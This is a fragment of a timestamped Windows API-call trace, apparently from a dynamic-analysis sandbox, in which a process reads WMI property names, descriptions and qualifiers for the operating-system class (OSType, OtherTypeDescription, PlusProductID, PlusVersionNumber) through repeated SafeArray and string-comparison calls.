	[0050.734] SafeArrayGetElement (in: psa=0x233e128bf50, rgIndices=0x350027ed90, pv=0x350027ed88 | out: pv=0x350027ed88) returned 0x0
	[0050.734] IWbemClassObject:Get (in: This=0x233e12e51d0, wszName="Name", lFlags=0, pVal=0x350027edd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Values", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.734] IWbemClassObject:Get (in: This=0x233e12e51d0, wszName="QualifierValue", lFlags=0, pVal=0x350027ee08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ee08*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128bfd0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x233e12ee2e0, rgsabound=((cElements=0x3a, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.735] SafeArrayGetLBound (in: psa=0x233e128bfd0, nDim=0x1, plLbound=0x350027edac | out: plLbound=0x350027edac) returned 0x0
	[0050.735] SafeArrayGetUBound (in: psa=0x233e128bfd0, nDim=0x1, plUbound=0x350027eda8 | out: plUbound=0x350027eda8) returned 0x0
	[0050.735] lstrlenW (lpString="CIMTYPE") returned 7
	[0050.735] lstrlenW (lpString="Values") returned 6
	[0050.735] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="CIMTYPE", cchCount2=7) returned 3
	[0050.735] lstrlenW (lpString="read") returned 4
	[0050.735] lstrlenW (lpString="Values") returned 6
	[0050.735] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="read", cchCount2=4) returned 3
	[0050.735] lstrlenW (lpString="write") returned 5
	[0050.735] lstrlenW (lpString="Values") returned 6
	[0050.735] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="write", cchCount2=5) returned 1
	[0050.735] lstrlenW (lpString="In") returned 2
	[0050.735] lstrlenW (lpString="Values") returned 6
	[0050.735] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="In", cchCount2=2) returned 3
	[0050.735] lstrlenW (lpString="Out") returned 3
	[0050.735] lstrlenW (lpString="Values") returned 6
	[0050.735] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="Out", cchCount2=3) returned 3
	[0050.735] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.735] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.735] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.735] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.735] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.735] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.735] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.736] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.736] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.736] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.736] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.736] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.736] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.736] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.737] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.737] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.737] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.737] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.737] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.737] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.737] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.737] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.737] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.738] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.738] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.738] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.738] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.738] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.738] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.739] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.739] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.739] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.739] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.739] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.739] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.739] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.740] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.740] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.740] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.740] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.740] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.741] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.741] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.741] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.741] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.741] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.741] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.741] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.741] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.741] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.742] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.742] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.742] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.742] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.742] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.742] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.742] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.742] SafeArrayGetElement (in: psa=0x233e128bfd0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.743] IUnknown:Release (This=0x233e12e51d0) returned 0x1
	[0050.743] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.743] SysStringLen (param_1="OSType") returned 0x6
	[0050.743] SysStringLen (param_1="Description") returned 0xb
	[0050.743] SysStringLen (param_1="OSType") returned 0x6
	[0050.743] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0050.743] SysStringLen (param_1="OSType") returned 0x6
	[0050.743] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0050.743] SysStringLen (param_1="OSType") returned 0x6
	[0050.743] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0050.743] SysStringLen (param_1="OSType") returned 0x6
	[0050.743] SysStringLen (param_1="OSLanguage") returned 0xa
	[0050.743] SysStringLen (param_1="OSType") returned 0x6
	[0050.743] SysStringLen (param_1="Organization") returned 0xc
	[0050.743] SysStringLen (param_1="OSType") returned 0x6
	[0050.743] SysStringLen (param_1="OSProductSuite") returned 0xe
	[0050.743] SysStringLen (param_1="OSProductSuite") returned 0xe
	[0050.743] SysStringLen (param_1="OSType") returned 0x6
	[0050.744] IUnknown:Release (This=0x233e12dbb50) returned 0x1
	[0050.744] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.744] IWbemClassObject:Get (in: This=0x233e12d95b0, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ea7d8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OtherTypeDescription", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.744] IWbemClassObject:Get (in: This=0x233e12d95b0, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ea598, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="OtherTypeDescription", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.744] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.744] IWbemClassObject:Get (in: This=0x233e12d95b0, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="A string describing the manufacturer and operating system type - used when the operating system property, OSType, is set to 1 (\"Other\"). The format of the string inserted in OtherTypeDescription should be similar in format to the Values strings defined for OSType.  OtherTypeDescription should be set to NULL when OSType is any value other than 1.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.744] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.744] lstrlenA (lpString="") returned 0
	[0050.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc0f0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.744] SysStringLen (param_1="A string describing the manufacturer and operating system type - used when the operating system property, OSType, is set to 1 (\"Other\"). The format of the string inserted in OtherTypeDescription should be similar in format to the Values strings defined for OSType.  OtherTypeDescription should be set to NULL when OSType is any value other than 1.") returned 0x15b
	[0050.744] SysStringLen (param_1="") returned 0x0
	[0050.745] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.745] IWbemClassObject:Get (in: This=0x233e12d95b0, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ef120*(cDims=0x1, fFeatures=0x240, cbElements=0x8, cLocks=0x0, pvData=0x233e1270fc0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.745] SafeArrayGetLBound (in: psa=0x233e12ef120, nDim=0x1, plLbound=0x350027edb4 | out: plLbound=0x350027edb4) returned 0x0
	[0050.745] SafeArrayGetUBound (in: psa=0x233e12ef120, nDim=0x1, plUbound=0x350027edb8 | out: plUbound=0x350027edb8) returned 0x0
	[0050.745] SafeArrayGetElement (in: psa=0x233e12ef120, rgIndices=0x350027ed90, pv=0x350027ed88 | out: pv=0x350027ed88) returned 0x0
	[0050.745] IWbemClassObject:Get (in: This=0x233e12e5c90, wszName="Name", lFlags=0, pVal=0x350027edd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MaxLen", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.745] IWbemClassObject:Get (in: This=0x233e12e5c90, wszName="QualifierValue", lFlags=0, pVal=0x350027ee08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ee08*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12eeea0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x233e12711a0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.745] SafeArrayGetLBound (in: psa=0x233e12eeea0, nDim=0x1, plLbound=0x350027edac | out: plLbound=0x350027edac) returned 0x0
	[0050.745] SafeArrayGetUBound (in: psa=0x233e12eeea0, nDim=0x1, plUbound=0x350027eda8 | out: plUbound=0x350027eda8) returned 0x0
	[0050.745] lstrlenW (lpString="CIMTYPE") returned 7
	[0050.745] lstrlenW (lpString="MaxLen") returned 6
	[0050.745] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="CIMTYPE", cchCount2=7) returned 3
	[0050.745] lstrlenW (lpString="read") returned 4
	[0050.745] lstrlenW (lpString="MaxLen") returned 6
	[0050.745] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="read", cchCount2=4) returned 1
	[0050.745] lstrlenW (lpString="write") returned 5
	[0050.745] lstrlenW (lpString="MaxLen") returned 6
	[0050.745] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="write", cchCount2=5) returned 1
	[0050.745] lstrlenW (lpString="In") returned 2
	[0050.745] lstrlenW (lpString="MaxLen") returned 6
	[0050.745] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="In", cchCount2=2) returned 3
	[0050.745] lstrlenW (lpString="Out") returned 3
	[0050.745] lstrlenW (lpString="MaxLen") returned 6
	[0050.745] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="Out", cchCount2=3) returned 1
	[0050.745] SafeArrayGetElement (in: psa=0x233e12eeea0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.746] IUnknown:Release (This=0x233e12e5c90) returned 0x1
	[0050.746] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.746] SysStringLen (param_1="OtherTypeDescription") returned 0x14
	[0050.746] SysStringLen (param_1="Description") returned 0xb
	[0050.746] SysStringLen (param_1="OtherTypeDescription") returned 0x14
	[0050.746] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0050.746] SysStringLen (param_1="OtherTypeDescription") returned 0x14
	[0050.746] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0050.746] SysStringLen (param_1="OtherTypeDescription") returned 0x14
	[0050.746] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0050.746] SysStringLen (param_1="OtherTypeDescription") returned 0x14
	[0050.746] SysStringLen (param_1="OSLanguage") returned 0xa
	[0050.746] SysStringLen (param_1="OtherTypeDescription") returned 0x14
	[0050.746] SysStringLen (param_1="OSType") returned 0x6
	[0050.746] SysStringLen (param_1="OtherTypeDescription") returned 0x14
	[0050.746] SysStringLen (param_1="Organization") returned 0xc
	[0050.746] SysStringLen (param_1="Organization") returned 0xc
	[0050.746] SysStringLen (param_1="OtherTypeDescription") returned 0x14
	[0050.747] IUnknown:Release (This=0x233e12d95b0) returned 0x1
	[0050.747] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.747] IWbemClassObject:Get (in: This=0x233e12dc0b0, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12eb818, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PlusProductID", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.747] IWbemClassObject:Get (in: This=0x233e12dc0b0, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12eba48, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PlusProductID", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.747] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.747] IWbemClassObject:Get (in: This=0x233e12dc0b0, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The PlusProductID property contains the product identification number for the Windows Plus! operating system enhancement software (if installed).", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.747] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.747] lstrlenA (lpString="") returned 0
	[0050.747] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc120, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.747] SysStringLen (param_1="The PlusProductID property contains the product identification number for the Windows Plus! operating system enhancement software (if installed).") returned 0x91
	[0050.747] SysStringLen (param_1="") returned 0x0
	[0050.748] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.748] IWbemClassObject:Get (in: This=0x233e12dc0b0, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.748] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.748] SysStringLen (param_1="PlusProductID") returned 0xd
	[0050.748] SysStringLen (param_1="Description") returned 0xb
	[0050.748] SysStringLen (param_1="PlusProductID") returned 0xd
	[0050.748] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0050.748] SysStringLen (param_1="PlusProductID") returned 0xd
	[0050.748] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0050.748] SysStringLen (param_1="PlusProductID") returned 0xd
	[0050.748] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0050.748] SysStringLen (param_1="PlusProductID") returned 0xd
	[0050.748] SysStringLen (param_1="OSLanguage") returned 0xa
	[0050.748] SysStringLen (param_1="PlusProductID") returned 0xd
	[0050.748] SysStringLen (param_1="OSType") returned 0x6
	[0050.748] SysStringLen (param_1="PlusProductID") returned 0xd
	[0050.748] SysStringLen (param_1="Organization") returned 0xc
	[0050.748] SysStringLen (param_1="PlusProductID") returned 0xd
	[0050.748] SysStringLen (param_1="OtherTypeDescription") returned 0x14
	[0050.748] SysStringLen (param_1="OtherTypeDescription") returned 0x14
	[0050.748] SysStringLen (param_1="PlusProductID") returned 0xd
	[0050.749] IUnknown:Release (This=0x233e12dc0b0) returned 0x1
	[0050.749] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.749] IWbemClassObject:Get (in: This=0x233e12da070, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e1226458, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PlusVersionNumber", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.749] IWbemClassObject:Get (in: This=0x233e12da070, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ee558, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PlusVersionNumber", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.749] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.749] IWbemClassObject:Get (in: This=0x233e12da070, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The PlusVersionNumber property contains the version number of the Windows Plus! operating system enhancement software (if installed).", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.749] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.749] lstrlenA (lpString="") returned 0
	[0050.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc240, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.750] SysStringLen (param_1="The PlusVersionNumber property contains the version number of the Windows Plus! operating system enhancement software (if installed).") returned 0x85
	[0050.750] SysStringLen (param_1="") returned 0x0
	[0050.750] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.750] IWbemClassObject:Get (in: This=0x233e12da070, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.750] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.750] SysStringLen (param_1="PlusVersionNumber") returned 0x11
	[0050.750] SysStringLen (param_1="Description") returned 0xb
	[0050.750] SysStringLen (param_1="PlusVersionNumber") returned 0x11
	[0050.750] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0050.750] SysStringLen (param_1="PlusVersionNumber") returned 0x11
	[0050.750] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0050.750] SysStringLen (param_1="PlusVersionNumber") returned 0x11
	[0050.750] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0050.750] SysStringLen (param_1="PlusVersionNumber") returned 0x11
	[0050.750] SysStringLen (param_1="OSLanguage") returned 0xa
	[0050.750] SysStringLen (param_1="PlusVersionNumber") returned 0x11
	[0050.750] SysStringLen (param_1="OSType") returned 0x6
	[0050.750] SysStringLen (param_1="PlusVersionNumber") returned 0x11
	[0050.750] SysStringLen (param_1="OtherTypeDescription") returned 0x14
	[0050.750] SysStringLen (param_1="PlusVersionNumber") returned 0x11
	[0050.750] SysStringLen (param_1="PlusProductID") returned 0xd
	[0050.750] SysStringLen (param_1="PlusProductID") returned 0xd
	[0050.750] SysStringLen (param_1="PlusVersionNumber") returned 0x11
	[0050.751] IUnknown:Release (This=0x233e12da070) returned 0x1
	[0050.751] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.751] IWbemClassObject:Get (in: This=0x233e12da880, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ee558, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Primary", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
